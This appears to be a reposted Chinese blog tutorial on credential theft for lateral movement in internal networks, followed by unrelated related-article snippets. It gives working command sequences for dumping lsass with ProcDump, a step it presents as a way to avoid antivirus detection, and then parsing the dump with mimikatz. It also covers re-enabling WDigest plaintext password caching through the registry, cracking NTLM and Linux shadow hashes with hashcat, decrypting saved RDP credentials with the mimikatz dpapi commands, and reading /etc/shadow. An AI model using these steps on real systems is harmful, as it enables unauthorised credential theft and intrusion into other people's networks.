内网横向移动—WinLinux内存离线读取Hashcat破解RDPSSH存储提取

内网横向移动—Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取

  • 1. 前言
  • 2. Windows系统密码提取
    • 2.1. 在线读取
    • 2.2. 离线读取
      • 2.2.1. 无存储读取
        • 2.2.1.1. 读取文件
        • 2.2.1.2. 本地解密
      • 2.2.2. 有存储读取
    • 2.3. 解决高版本
      • 2.3.1. 修改注册表
      • 2.3.2. 重新登陆
    • 2.4. HASH破解
      • 2.4.1. 在线破解
      • 2.4.2. 本地破解
        • 2.4.2.1. 字典破解
        • 2.4.2.2. 暴力破解
    • 2.5. RDP凭据抓取
      • 2.5.1. 查看连接记录
      • 2.5.2. 查找本地的Credentials
      • 2.5.3. 查找guidMasterKey值
      • 2.5.4. 记录MasterKey
      • 2.5.5. 解密票据
  • 3. Linux系统密码提取
    • 3.1. 密码读取
    • 3.2. 密码破解
      • 3.2.1. 判断密码类型
      • 3.2.2. 加密形式破解
    • 3.3. SSH密钥

1. 前言

  关于SSH的密钥问题,本来想着先把关于SSH密钥的破解以及横向移动方式总结出来的,但是网上关于Linux系统横向移动手法,以及利用都太少了,目前也没看到很好的文章,很多问题确实把相关知识点总结了,但是感觉还是有点乱,所以就先把Linux横向移动方式先暂停,暂时不去总结Linux方面的横向移动。

  不过关于Linux方面的横向移动还是可以带一下的,因为从系统角度来说,Linux中横向移动的可利用方式确实少,正常情况下Linux系统利用多数都是利用Linux系统中安装的中间件软件等来实现横向移动。

2. Windows系统密码提取

  在Windows server 2012系统包括之后,微软为了防止明文密码泄露,就推出了一个补丁KB2871997,关闭了wdiges功能。也就是说当系统是Windows 10及Windows server 2012以上的时候,默认在内存缓存中不存储明文密码。

2.1. 在线读取

  其实这里在线读取也就是使用CS中自带的工具进行hash抓取以及读取明文密码,但是这里可以看到只能读取到hash值,并不是读取到明文密码。

在这里插入图片描述

  同时可以看到密码位置全部都是null,也就是空,是真实没有密码吗?其实就是由于Windows server 2012的版本问题,导致读取不到明文而已。

在这里插入图片描述

2.2. 离线读取

  通常来说使用mimikatz是会被杀的,而这时候我们可以使用微软官方的工具来进行读取,主要是针对在读取密码的时候被杀,而由于这个工具是微软的工具,所以可以免杀,不会被杀。

  ProcDump

  mimikatz

2.2.1. 无存储读取

  这里的无存储读取就是和上面差不多就是在正常读取的情况下,无法读取到明文密码。

2.2.1.1. 读取文件

  这里首先需要将工具上传到Windows server 2012上面进行运行,如何将运行后的文件导出来,再利用mimikatz进行读取。

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

2.2.1.2. 本地解密

  当上面命令执行后,会再当前目录出现一个文件名字为:lsass.dmp,当然名字是自己写的,但是后面的后缀是一定的。

  这里我们再运行本地的文件,导入密码,在进行读取,这里就是避免了被杀的风险,不过这里并不能读取到明文密码,还是读取的是hash值。

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full

在这里插入图片描述

2.2.2. 有存储读取

  关于有存储读取和无存储读取的操作是一样的,只是不同的是,需要管理员进行过登录,由于我演示的时候,采用的是DC就是Windows server 2012,所以导致无法使用激活管理员登陆,所以就不演示的。

  总的来说是一模一样的,这里我放一张别人的图片。

在这里插入图片描述

2.3. 解决高版本

  在前面一直说高版本无法读取明文密码,那么该怎么办,其实这里可以通过修改注册表来实现,然后强制锁屏,等待管理员重新登陆账号密码。

2.3.1. 修改注册表

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

在这里插入图片描述

2.3.2. 重新登陆

  这里我们锁屏然后重新登陆,再进行密码抓取,可以看到这里是成功获取到密码了。

在这里插入图片描述

2.4. HASH破解

  当然啦,这里也可以对HASH密码进行破解。

2.4.1. 在线破解

  在线破解就是通过一些在线网站进行破解,不过有些是需要钱的。

https://www.somd5.com/
https://www.cmd5.com/

在这里插入图片描述

2.4.2. 本地破解

  关于本地破解,怎么说呢,需要有一个超大的密码本,部分情况下需要强大的CPU与GPU来进行运算。

  hashcat是一款可以基于显卡暴力破解密码的工具,几乎支持了所有常见的加密,并且支持各种姿势的密码搭配
kali Linux中自带的有,也支持Windows Mac平台

  这里我们就简单的来说说用法吧,具体用法可以自行去网上搜索,或者后期有时候来写一篇专门的总结吧!同时要注意哦,我使用了代理依旧下载很吗,所以需要等等。

  hashcat

2.4.2.1. 字典破解

  这里需要将hash值复制进去,pass密码本也要准备好,主要就是看电脑的性能来进行破解了。

hashcat.exe -a 0 -m 1000 hash.txt pass.txt

在这里插入图片描述

2.4.2.2. 暴力破解

  暴力破解是能够破解成功的,不过需要超高的CPU与GPU的计算,尤其是一些又长又复杂的密码,下面是密码的组合。

-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字

  这里就需要知道密码是多少位,第一位是大写还是小写,第二位是数字还是字母,我总感觉有点不对劲,实战中我怎么知道第一位是数字还是字母还是大写小写,这有很多组合呀。

  比如我这个admin@123,完全是理想化的,写法如下:

hashcat.exe -a 3 -m 1000 579da618cfbfa85247acf1f800a280a4 ?l?l?l?l?l?s?d?d?d

  如果允许不了将上面测试的密码记录删除即可。

在这里插入图片描述

2.5. RDP凭据抓取

  RDP是有一个保存凭据的选项的,正常情况下有些管理员为了方便会勾选凭据。

在这里插入图片描述

2.5.1. 查看连接记录

  这里通过命令可以查看到连接记录。

cmdkey /list

在这里插入图片描述

2.5.2. 查找本地的Credentials

  将这里的值记录下来。

dir /a %userprofile%\appdata\local\microsoft\credentials\*

在这里插入图片描述

2.5.3. 查找guidMasterKey值

  这里需要将目标的Credentials记录guidMasterKey值记录下来,还有这里前面的路径一定要更具自己的路径来,不要直接复制粘贴,否则会出现错误。

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718

在这里插入图片描述

2.5.4. 记录MasterKey

  这里需要将guidMasterKey对应的MasterKey记录下来。

mimikatz sekurlsa::dpapi

在这里插入图片描述

2.5.5. 解密票据

  这里仔细看命令,是需要相互结合起来的。

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718 /masterkey:8a5b068bf179d5617421dc04bd2b310d319badf9d79421e7c0a9bf685317f23b1f7be9666983ca3af76939256c2267ba0d4ab600962e4940fcf09be61d101c1d

在这里插入图片描述

3. Linux系统密码提取

  关于Linux系统的密码提前其实是挺少的,而且成功率也低。

3.1. 密码读取

  这个不一定成功哦,这里我也是运行后一直没反应。

  mimipenguin

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

在这里插入图片描述

3.2. 密码破解

  密码破解其实就是和上面Windows密码破解是一样的。

3.2.1. 判断密码类型

  这里通过查看root加密来判断类型,我实在是没搜到我这个y是什么加密。

  判断加密类型

cat /etc/shadow

在这里插入图片描述

3.2.2. 加密形式破解

linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt

3.3. SSH密钥

  关于SSH密钥后面有空出一篇总结,个人感觉还挺复杂的,还在理解中。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/29355.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

分布式Redis详解

目录 前言安装redis的俩种方法Redis 与 MySQL的区别Redis可以实现那些功能Redis常用的数据类型有序列表的底层是如何实现的?什么是跳跃表 Redis在Spring中的使用Redis 中为什么单线程比多线程快Redis的分布式锁如何实现Redis 分布式锁可能出现的问题Redis保持数据不丢失的方式…

掌握C语言输入技巧:getchar()函数消除回车符困扰

在C语言编程的旅程中,你可能会遇到一个令人困惑的情况:使用getchar()函数获取字符时,那讨厌的回车符(\n)又是如何产生和处理的呢?本文将为你揭示这个问题,并分享几种消除回车符困扰的经验。 一…

企升编辑器word编写插件

面向用户群体招投标人员,用统一的模板来编写标书,并最终合并标书。项目经理,编写项目开发计划书,项目验收文档等。开发人员,编写项目需求规格说明书、设计说明书、技术总结等文档。其他文档编写工作量较多的岗位人员。…

vue 点击顶部tab重新请求列表

我们点击 1 2 来回切换时,发现客户经理的列表不会重新请求(菜单中含有客户经理) 这时我们添加以下代码就可以了 watch: {$route(route) {this.getList()}},/** 查询客户经理列表 */getList() {this.loading true;listManager(this.queryParams).then(response > {this.mana…

垃圾搜集器UseParallelGC

查看jdk支持的垃圾收集器有哪些? 当前进程使用的垃圾收集器是什么? 查看默认设置 查看默认设置命令: java -XX:PrintCommandLineFlags -version# -XX:UseParallelGC 查看默认垃圾收集器详细信息命令 通过新生代、老年代名字确定垃圾收集器…

【CSS3】CSS3 动画 ④ ( 使用动画制作地图热点图 )

文章目录 一、需求说明二、动画代码分析1、地图背景设置2、热点动画位置测量3、热点动画布局分析4、动画定义5、小圆点实现6、波纹效果盒子实现7、延迟动画设置 三、代码示例 一、需求说明 实现如下效果 , 在一张地图上 , 以某个位置为中心点 , 向四周发散 ; 核心 是实现 向四周…

git使用(常见用法)

一.下载git git官方下载跳转 安装简单,有手就行 二. git的简单使用 1. 连接远程仓库 #初始化 git init #配置账户 git config --global user.name “输入你的用户名” git config --global user.email “输入你的邮箱” git config --list #--q退出 #配置验证邮箱 ssh-key…

前端懒加载

懒加载的概念 懒加载也叫做延迟加载、按需加载,指的是在长网页中延迟加载图片数据,是一种较好的网页性能优化的方式。在比较长的网页或应用中,如果图片很多,所有的图片都被加载出来,而用户只能看到可视窗口的那一部分…

【网络编程】利用套接字实现一个简单的网络通信(UDP实现聊天室 附上源码)

网络编程套接字 🐛预备知识🦋理解源IP地址和目的IP地址🐌认识端口号🐞 理解 "端口号" 和 "进程ID"🐜简单认识TCP协议🦟简单认识UDP协议🦗 什么是网络字节序 🕷相…

使用 Docker 和 Streamlit 构建和部署 LangChain 支持的聊天应用程序

文章目录 前言聊天应用程序组件和技术LangChain Python框架开放人工智能模型前端 Streamlit UI使用 Docker 进行部署Docker 优化以实现轻量级和快速构建Docker-compose.yaml 文件基础设施Streamlit 公共云谷歌应用引擎使用 Google Cloud Run 部署应用1.启动服务2. 创建角色并将…

Debezium系列之:增量快照初始化历史数据实际应用案例

Debezium系列之:增量快照初始化历史数据实际应用案例 一、需求背景二、查看数据库表数据三、使用增量快照采集历史数据四、初始化历史数据一、需求背景 采集数据库数据发送到Kafka Topic,供下游实时开发消费,在采集最新数据的同时,希望把历史数据也发送到Kafka Topic同时采…

设置height:100%无效的原因以及两种解决方法

原因&#xff1a;我们知道在把盒子宽度自适应为浏览器窗口宽度&#xff0c;只需设置width:100%就可轻松解决问题&#xff0c;但是让盒子的高度自适应浏览窗口的高度并非那么容易&#xff0c;这是因为css内部计算的原因 <!-- 高度实际为字体大小 --> <div class"…

Vscode-工具使用

Vscode &#xff0c;这玩意儿是开源的&#xff0c;以前用收费的破解版&#xff0c;过段时间就高版本不匹配&#xff0c;这次搞个不要钱的玩玩&#xff0c;记录使用心得 下载 下载地址&#xff1a;官网 点击下载&#xff0c;但是这里有个问题下载比较慢&#xff0c;解决办法&a…

【Git】保姆级详解:Git配置SSH Key(密钥和公钥)到github

博主简介&#xff1a;22级计算机科学与技术本科生一枚&#x1f338;博主主页&#xff1a;是瑶瑶子啦每日一言&#x1f33c;: “当人们做不到一些事情的时候&#xff0c;他们会对你说你也同样不能。”——《当幸福来敲门》 克里斯加德纳 Git配置SSH Key 一、什么是Git?二、什么…

在CPU上安装部署chatglm-6b实用经验分享

chatglm-6b很强&#xff0c;很多同学都想自己试一试&#xff0c;但不是每个人都有GPU、高端显卡的环境&#xff0c;大多数同学都是一台普通的笔记本。 笔者这里分享一下在自己的8G内存&#xff0c;intel i3笔记本上安装部署chatglm-6b的实际经验。有很多网站都分享了一些经验&…

算法工程师-机器学习面试题总结(3)

FM模型 FM模型与逻辑回归相比有什么优缺点&#xff1f; FM&#xff08;因子分解机&#xff09;模型和逻辑回归是两种常见的预测建模方法&#xff0c;它们在一些方面有不同的优缺点。 FM模型的优点&#xff1a; 1. 能够捕获特征之间的交互作用&#xff1a;FM模型通过对特征向量…

模拟实现消息队列

目录 1. 需求分析1.1 介绍一些核心概念核心概念1核心概念2 1.2 消息队列服务器&#xff08;Broker Server&#xff09;要提供的核心 API1.3 交换机类型1.3.1 类型介绍1.3.2 转发规则&#xff1a; 1.4 持久化1.5 关于网络通信1.5.1 客户端与服务器提供的对应方法1.5.2 客户端额外…

ReadableStream流的js处理

需求 今天接了一个gpt的项目。需要对接接口。后端返回的数据是ReadableStream类型的。记录下如何处理ReadableStream类型的数据 代码 const response ... // response 是服务端返回的数据// 创建了一个数据读取器 const reader response.getReader(); // 创建了一个文本解…

UNIQUE VISION Programming Contest 2023 Summer(AtCoder Beginner Contest 312)D题题解

文章目录 [Count Bracket Sequences](https://atcoder.jp/contests/abc312/tasks/abc312_d)问题建模问题分析1.分析合法括号字符串的特点2.从集合角度分析字符串每个字符的作用代码 Count Bracket Sequences 问题建模 给定一个字符串&#xff0c;字符串内仅有3种字符&#xff…

java基础 面向对象 简答题

​​​​​ 1.面向对象的特征有哪些 封装&#xff1a;是指将数据和他的数据处理过程包装起来&#xff0c;隐藏类的内部细节 继承&#xff1a;新创建的类继承现有类的成员属性和方法&#xff0c;提高代码复用和扩展性 多态&#xff1a;两个特征向上造型和向下转型&#xff0c…